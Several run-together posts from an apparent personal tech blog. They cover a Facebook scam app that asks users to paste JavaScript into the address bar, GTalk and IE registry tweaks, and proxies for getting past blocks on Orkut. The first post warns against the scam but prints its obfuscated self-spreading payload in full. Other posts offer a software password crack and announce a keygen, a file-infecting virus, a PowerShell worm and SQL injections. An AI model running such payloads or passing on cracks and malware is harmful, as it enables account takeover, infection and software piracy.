A perfectly crafted FaceBook app to hack your account. Here is URL: 10 lies girls ALWAYS tell guys! funny! (Do not follow instructions unless you want your account be compromised)

The app asks you to press <ctrl> + C, <alt> + D, <ctrl> + V and <enter> to paste a JavaScript in to your browser’s address bar. I don’t know what will happen next, follow the instructions if you want your account to be compromised .

JavaScript it pastes:
javascript:(function(){a='app120196878004524_jop';b='app120196878004524_jode';ifc='app120196878004524_ifc';ifo='app120196878004524_ifo';mw='app120196878004524_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

The app has an hidden <textarea> with keyboard focus. When you press <ctrl> + C, its content gets selected and then you follow instructions to paste it in address bar! Never ever do that.

1. Install User Agent Switcher addon in Firefox
2. Restart Firefox
3. Go to Options Menu > Default User Agent. Select iPhone 3.0
4. Log on to https://m.google.com/app/buzz

and you are there… Happy Buzzing!

1. Created a reply mail (in Gmail).
2. Attached two files. One of them was malicious ‘installed.php’. The attachment was successful.
3. Saved draft.
4. Clicked ‘Send‘ button, and got confirmation about successful send.
5. Now when I clicked ‘Your message have been sent. View message.‘, voila! nothing happen and it didn’t even showed me my mail.
6. Later after few hour I realized that mail has not been sent and still there as draft!

That’s why they call it beta!

[ Note: Ideally a message with viruses should not circulated. My concern in this post is the invalid message/alert displayed to user! ]

- ankit

I have verified and this trick works!!! Once your account is hacked, even changing the password has no effect either.

Few months back I have written a post about our online privacy. And this is an example of how worse it can happen to you. Your views are welcomed.

Note: Recently one bug in Google Search caused all results to be flagged as malware.

- ankit

Complete steps are written in the readMe.rtf inside zip. Make sure you take *backup* before applying the patch.

Download it here: tally password crack

- ankit

Update: I have patch for Tally 4.5 version only. Any request for other versions will not be entertained.

1. Did you ever wish to run two instances for GTalk? This is possible and plain simple. Navigate to the shortcut that launches Google Talk (if not available, right click on C:\Program Files\Google\Google Talk\googletalk.exe and select Create Shortcut). Open properties. Add /nomutex in the target textbox.
2. To keep GoogleTalk always on top: Go to the registry entry HKEY_CURRENT_USER\Software\Google\Google Talk\Options, create a new DWORD show_pin and set its value to 1. Restart GTalk and you will see a pin near the minimize button.
3. To bring all GTalk windows in front press [Win] + [Esc] keys on keyboard.
4. To write in bold use *this text is bold* and for italic _this is italic_.
5. Coping someone’s avatar: Navigate to %userprofile%\AppData\Local\Google\google talk\avatars\. This directory contains all avatars cached in PNG format (rename them). Search by email in avatar.txt to find your friends avatar.

- ankit

• here is the code for WinZip 9.0 Serial Key Generator,
• a virus/worm that infects all .exe files in current directory by copying the .exe host to .sys and overwrite the .exe file,
• the first PowerShell Worm which changes it variable names every time the worm runs
• some SQL Injections

I am not responsible for any damage you do with the knowledge you get from above links! Take Care!

~ Ankit

Is Orkut Blocked in your organization/network, No worries…. here are some hacks:

1. Try https://orkut.com
2. Else, try https://images.orkut.com
3. Else, try https://images3.orkut.com
4. Else, use any of the following anonymous web proxies, means virtual browser.

Well, if you are using images.orkut.com, it won’t show you images. You might need (if you really want) a plug-in, IE-Orkut.zip, to fix the same. Download and install IESetup.msi, Open IE, and logon to https://images.orkut.com, right click within the browser and say ‘Fix Orkut’. Probably it will display few security warnings (because of certificate error), just ignore all those by clicking Yes.

~ Ankit
[Never surf Internet, feel it]

[ Edit By Ankit on 30th Sept 2006: Hack to an Hack !

Well, basically the setup just copies some files to Windows\System32 folder. One of it is FixOrkut.html. Open this file in any text editor and replace "images.orkut.com" with "orkut.com" in the first "if" condition, to make it working for https://www.orkut.com also. Read more at Writing Extensions for Internet Explorer ]

[Here are some anonymous proxy websites. Try them out. I guess for few of them this will work.

http://concealmy.info, http://proxyindex.com, http://underfirewall.com, http://hugeproxy.com, http://proxyfree.org, http://unblockweb.com, http://proxy80.com, http://slickproxy.com, http://goproxing.com, http://modernproxy.com, http://proxylord.com, http://japanproxy.com, http://ehobo.com, http://atunnel.com, http://proxoid.com, http://blockbegone.com, http://proxyline.us, http://proxyweb.net, http://antifw.tk, http://usa.mygr8.info, http://proxsafe.net, http://proxytips.com, http://backfox.com, http://shoutproxy.com, http://unblockthis.com, http://daveproxy.co.uk, http://stealthclick.com, http://myproxy.ca, http://dejacey.com,
http://proxyspy.com, http://netsack.net, http://cloakme.net, http://7eth.com, http://proxycover.net, http://proxynanny.com, http://rockproxy.com, http://proxymummy.com, proxy.tl, letmepast.com, myinternetproxy.com, seekproxy.com, proxcloak.com, proxxed.net, myspaceproxyy.com, http.ws, arandomproxy.com, dunkindonuts.be, blockstop.net, buzzysplat.com, pureprivacy.com, proxyhttps.com, bombproxy.com, fullyproxy.com, pruxxy.com, getaroundfilters.com, sneakyuser.com, ipdefend.com, proxydown.com, proxydrop.com, pipeproxy.com, spysurfing.com, yourportal.us, pruxxy.com, pimpmyip.com, killerproxy.com, anonasurf.com, proxyzap.com, snoopblock.com, afreefunkoxy.com, foxyproxy.net, officeproxy.net, provacy.com, proxy.icarusindie.com:2004, proxylife.com, surfonsteroids.com, w00tage.com, jcz.net, browsefrom.com, dirtyproxy.com, proxace.com, illegalproxy.com, proxyflux.com, roboproxy.com, v3proxy.com, privprox.com, ninjaproxy.com, jiggyproxy.com, webwarper.net, zeroproxy.com, proxytheweb.com, blockmenot.com, proxydevil.com, angryproxy.com, proxee.net, etproxy.com, firewalldown.com, proxybum.com, cdweb.info, proxyvibe.com, boxofprox.com, blockmenot.co.uk, prooxle.com, guardster.com, nevercaught.com, shipproxy.com, fullyproxy.com, gopast.net, proxytiger.com, hideus.com, bypasslive.com, grandproxy.com
]

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\

This is the place from where IE7 (Microsoft Internet Explorer 7) builds search engine details. Now the things are obvious, add two string values named “DisplayName” & “URL”. For example if you want to add a Google Blog search, use URL as http://www.blogsearch.google.com/blogsearch?q={searchTerms}

Here {searchTerm} is the string appeared in the search text box.

There is one more way you can incorporate search engines called ‘Search Engine Assistants’. On adding following items to your registry it adds a WikiPedia and MSN search assistants to IE. This mean when you type ‘wp msn’ in address bar, it goes to WikiPedia for the definition for MSN.

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\m]
@=”http://beta.search.live.com/results.aspx?q=%s”
“%”=”%25″
“&”=”%26″
“+”=”%2B”

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\wp]
@=”http://en.wikipedia.org/wiki/%s”
” “=”_”
“%”=”%25″
“&”=”%26″
“+”=”%2B”

Rest of the items defines what to be replaced; i.e. “%” will be replaced by %25 (encoded URL)

~ Ankit

[Edited: Oct 13th, 2006]
And here we go to hack an Ajax website.

• Using ‘Firebug’ (and extension to FireFox) you can discover ajax calls, stack trace of errors, etc;
• Using ‘chickenfoot’ provides a programming environment within the browser (ie. simulation of user clicks, etc;)

~ Ankit